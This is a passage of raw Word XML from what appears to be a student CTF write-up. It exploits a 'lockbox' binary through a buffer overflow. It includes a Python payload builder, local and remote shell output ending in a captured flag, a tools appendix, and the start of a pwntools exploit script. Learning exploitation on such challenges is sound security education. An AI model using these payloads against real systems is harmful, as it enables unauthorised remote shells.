          <w:p w14:paraId="12768859" w14:textId="77777777" w:rsidR="00150680" w:rsidRDefault="00844825" w:rsidP="00844825">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">win = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>b"</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>".join</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>([</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>struct.pack</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">("B", 0xb6), </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>struct.pack</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>("B", 0x11),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53E61E4B" w14:textId="4D10859C" w:rsidR="00844825" w:rsidRDefault="00150680" w:rsidP="00844825">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">              </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00844825">
              <w:t>struct.pack</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00844825">
              <w:t xml:space="preserve">("B", 0x40), </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00844825">
              <w:t>struct.pack</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00844825">
              <w:t>("B", 0x00)])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7727D6B0" w14:textId="3E250D1F" w:rsidR="00844825" w:rsidRDefault="00844825" w:rsidP="00844825">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">return pad16 + </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>keyAddr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> + pad0 + secret + pad44 + win + pad0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6E86C39F" w14:textId="491F474D" w:rsidR="00844825" w:rsidRDefault="00844825" w:rsidP="00844825">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Building a Payload with the Secret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8C21BA" w14:textId="004FB17F" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6">
      <w:r>
        <w:t xml:space="preserve">The comparison will see that the values match, and the program will set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00844825">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>mystring</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> appropriately to give the user a shell when </w:t>
      </w:r>
      <w:r w:rsidRPr="00844825">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>lockbox</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> calls </w:t>
      </w:r>
      <w:r w:rsidRPr="00844825">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>system</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BBC5A0" w14:textId="54FF7AF9" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6">
      <w:r>
        <w:t xml:space="preserve">This final payload causes </w:t>
      </w:r>
      <w:r w:rsidRPr="00844825">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>lockbox</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to open a system shell when </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ran</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> loc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825" w14:paraId="14E4FFCE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A540814" w14:textId="77777777" w:rsidR="00844825" w:rsidRDefault="00844825" w:rsidP="00844825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64C6D003" w14:textId="20D37B30" w:rsidR="00844825" w:rsidRDefault="00844825" w:rsidP="00844825">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>└─$ python3 Lockbox_Pwn.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05546A52" w14:textId="150D67CD" w:rsidR="00844825" w:rsidRDefault="00844825" w:rsidP="00844825">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">[*] Switching to interactive </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>mode</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="127F717B" w14:textId="77777777" w:rsidR="00844825" w:rsidRDefault="00844825" w:rsidP="00844825">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">$ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>whoami</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="3E313D2C" w14:textId="77777777" w:rsidR="00844825" w:rsidRDefault="00844825" w:rsidP="00844825">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>kali</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02049163" w14:textId="77777777" w:rsidR="00844825" w:rsidRDefault="00844825" w:rsidP="00844825">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">$ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pwd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="0D3DBF6A" w14:textId="6C89B5C9" w:rsidR="00844825" w:rsidRDefault="00844825" w:rsidP="00844825">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>/home/kali/Desktop/4-Week</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="30364174" w14:textId="1A405814" w:rsidR="00844825" w:rsidRDefault="00844825" w:rsidP="00844825">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Local Success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F996530" w14:textId="77777777" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6"/>
    <w:p w14:paraId="4ACBC904" w14:textId="77777777" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The same payload also results in a shell on a remote instance of </w:t>
      </w:r>
      <w:r w:rsidRPr="00200143">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>lockbox</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. An attacker can leverage the remote shell to get the contents of </w:t>
      </w:r>
      <w:r w:rsidRPr="00200143">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>flag.tx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143" w14:paraId="4EA8BA9C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7B7F3877" w14:textId="77777777" w:rsidR="00200143" w:rsidRDefault="00200143" w:rsidP="00200143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4-Week]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AA631A1" w14:textId="580C2380" w:rsidR="00200143" w:rsidRDefault="00200143" w:rsidP="00200143">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>└─$ python3 Lockbox_Pwn.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34CAC5D4" w14:textId="77777777" w:rsidR="00200143" w:rsidRDefault="00200143" w:rsidP="00200143">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">[*] Switching to interactive </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>mode</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="621435C6" w14:textId="77777777" w:rsidR="00200143" w:rsidRDefault="00200143" w:rsidP="00200143">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C5FCC04" w14:textId="77777777" w:rsidR="00200143" w:rsidRDefault="00200143" w:rsidP="00200143">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">$ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>whoami</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="42227C30" w14:textId="77777777" w:rsidR="00200143" w:rsidRDefault="00200143" w:rsidP="00200143">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pwn</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="400302E5" w14:textId="77777777" w:rsidR="00200143" w:rsidRDefault="00200143" w:rsidP="00200143">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>$ ls</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E92F3A4" w14:textId="77777777" w:rsidR="00200143" w:rsidRDefault="00200143" w:rsidP="00200143">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>flag.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7699BC5B" w14:textId="77777777" w:rsidR="00200143" w:rsidRDefault="00200143" w:rsidP="00200143">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>lockbox</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02DBF0D7" w14:textId="77777777" w:rsidR="00200143" w:rsidRDefault="00200143" w:rsidP="00200143">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t>$ cat flag.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="463DDF34" w14:textId="4AB30C4C" w:rsidR="00200143" w:rsidRDefault="00200143" w:rsidP="00200143">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>flag{</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>Wh0_n33d5_A_k33y_wen_U_h4v3_a_B0F}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3A0BE204" w14:textId="2AB58ACA" w:rsidR="00200143" w:rsidRDefault="00200143" w:rsidP="00200143">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Remote</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC4E5D3" w14:textId="7DA19862" w:rsidR="00111E36" w:rsidRDefault="00200143" w:rsidP="00C670F2">
      <w:r>
        <w:t>The complete codebase used to debug and</w:t>
      </w:r>
      <w:r w:rsidRPr="00622F5C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00622F5C">
        <w:t>pwn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00622F5C">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>lockbox</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is available in </w:t>
      </w:r>
      <w:hyperlink w:anchor="_Appendix_D:_Lockbox_Pwn.py" w:history="1">
        <w:r w:rsidR="00622F5C" w:rsidRPr="00622F5C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Appendix D</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00622F5C">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A182512" w14:textId="741C0867" w:rsidR="00C85002" w:rsidRPr="006E5D6F" w:rsidRDefault="00C85002" w:rsidP="00111129">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="42974504" w14:textId="39B7DD40" w:rsidR="00C32533" w:rsidRPr="005264D0" w:rsidRDefault="0052786E" w:rsidP="00767735">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc159948661"/>
      <w:r w:rsidRPr="005264D0">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Appendix A: </w:t>
      </w:r>
      <w:r>
        <w:t>Student Information</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8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23916" w:rsidRPr="005264D0" w14:paraId="360EAC87" w14:textId="77777777" w:rsidTr="0052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B9173A8" w14:textId="11EC6E8A" w:rsidR="00C32533" w:rsidRPr="005264D0" w:rsidRDefault="0052786E" w:rsidP="00C32533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
              <w:t>Lindsay Von Tish</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="5C730EB9" w14:textId="77777777" w:rsidTr="0052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5" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BFD8F3B" w14:textId="7A78F21D" w:rsidR="00C32533" w:rsidRPr="005264D0" w:rsidRDefault="0052786E" w:rsidP="00C325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6655" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="796CC29E" w14:textId="35B27275" w:rsidR="00C32533" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00C32533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId9" w:history="1">
              <w:r w:rsidR="00437E81" w:rsidRPr="00F6092A">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                </w:rPr>
                <w:t>lmv9443@nyu.edu</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00437E81">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="34B4CA48" w14:textId="0998245E" w:rsidR="00A34711" w:rsidRPr="005264D0" w:rsidRDefault="00087743" w:rsidP="00767735">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc159948662"/>
      <w:r w:rsidRPr="005264D0">
        <w:t>Appendix B: Tools</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9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23916" w:rsidRPr="005264D0" w14:paraId="0A80666C" w14:textId="77777777" w:rsidTr="00AE6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</w:tcPr>
          <w:p w14:paraId="1F7CC08C" w14:textId="6B7167F9" w:rsidR="001911E4" w:rsidRPr="005264D0" w:rsidRDefault="00087743" w:rsidP="00A34711">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7015" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FF37948" w14:textId="63DDC162" w:rsidR="001911E4" w:rsidRPr="005264D0" w:rsidRDefault="00087743" w:rsidP="00A34711">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="5E2CF7DD" w14:textId="77777777" w:rsidTr="00AE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14:paraId="7AE5F79A" w14:textId="007F2914" w:rsidR="001911E4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DB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7015" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6358BBE4" w14:textId="0475512D" w:rsidR="001911E4" w:rsidRPr="002E0856" w:rsidRDefault="00000000" w:rsidP="00A34711">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId10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www.gnu.org/software/gdb/gdb.html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E0856" w:rsidRPr="005264D0" w14:paraId="0F6FC29B" w14:textId="77777777" w:rsidTr="00AE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5" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11C7CF3B" w14:textId="609D2B05" w:rsidR="002E0856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Ghidra</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7015" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3965BF7C" w14:textId="61BD19B4" w:rsidR="002E0856" w:rsidRPr="002E0856" w:rsidRDefault="00000000" w:rsidP="00A34711">
            <w:pPr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11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ghidra-sre.org/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E0856" w:rsidRPr="005264D0" w14:paraId="3080E212" w14:textId="77777777" w:rsidTr="00AE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14:paraId="7BCC968D" w14:textId="1B5E67E9" w:rsidR="002E0856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Netcat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7015" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72B8A438" w14:textId="23AA4B9D" w:rsidR="002E0856" w:rsidRPr="002E0856" w:rsidRDefault="00000000" w:rsidP="00A34711">
            <w:pPr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12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netcat.sourceforge.net/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E0856" w:rsidRPr="005264D0" w14:paraId="2E4DB3E9" w14:textId="77777777" w:rsidTr="00AE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5" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1AFF5B4D" w14:textId="1E204924" w:rsidR="002E0856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 w:rsidRPr="002E0856">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>PwnTools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7015" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="515E6B78" w14:textId="114F4B2B" w:rsidR="002E0856" w:rsidRDefault="00000000" w:rsidP="00A34711">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId13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github.com/Gallopsled/pwntools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</w:tbl>
    <w:p w14:paraId="430646AA" w14:textId="77777777" w:rsidR="00C670F2" w:rsidRDefault="00C670F2" w:rsidP="00225AF6">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Appendix_C:_Mathwhiz"/>
      <w:bookmarkStart w:id="11" w:name="_Appendix_C:_Stropsploit.py"/>
      <w:bookmarkEnd w:id="10"/>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="267DDF6B" w14:textId="77777777" w:rsidR="00C670F2" w:rsidRDefault="00C670F2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1481AB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14:paraId="79E1C31D" w14:textId="6E4A1CD7" w:rsidR="00C670F2" w:rsidRPr="00111129" w:rsidRDefault="00437E81" w:rsidP="00767735">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Appendix_C:_Postage"/>
      <w:bookmarkStart w:id="13" w:name="_Appendix_C:_Boffin"/>
      <w:bookmarkStart w:id="14" w:name="_Toc159948663"/>
      <w:bookmarkEnd w:id="12"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidRPr="005264D0">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Appendix </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">C: </w:t>
      </w:r>
      <w:r w:rsidR="00A30EF8">
        <w:t>Boffin_Pwn.p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FE" w:rsidRPr="00E23C61" w14:paraId="0C73B800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0ABA7A27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from </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>pwn</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> import *</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EECE31D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import re</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50D1AB2C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import </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>struct</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="507488AC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21AC1E2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 A function to convert encoded input to a string and remove text format characters</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="630CA430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Input: Encoded string</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7703BB39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Output: Unencoded string</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65326839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def </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>cleanLine</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>(ln):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59D54FE9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r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ansi_escape</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>re.compile</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>(r'\x1B(?:[@-Z\\-_]|\[[0-?]*[ -/]*[@-~])')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67678B7D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l = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ansi_escape.sub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'', str(ln, encoding='utf-8'))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A5F1F3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return </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>l</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="7E3C5A09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6C571729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 A function to print register values</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64205E87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Input: Connection</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48D74AC4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Output: N/A</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="065C265C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def </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>getRegisters</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>(p):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18385324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sendline</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>("info registers")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43DA5D00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data = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>p.recvuntil</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>("(gdb)")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B2EA96F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print(data)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3826D866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45488910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0ABEF3A5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 A function to see how much input it takes for a segfault</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A95C9B2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Input: Connection</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F6799D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Output: N/A</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0484ACD6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def </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>segFuzz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:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70E75346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p </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>=  process</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>('/bin/bash')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="757293D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sendline</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>('gdb ./</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>boffin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> -q')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="479EC99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recv</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31A7A282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n = 0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07121F1C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base = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009C27BB">
              <w:rPr>
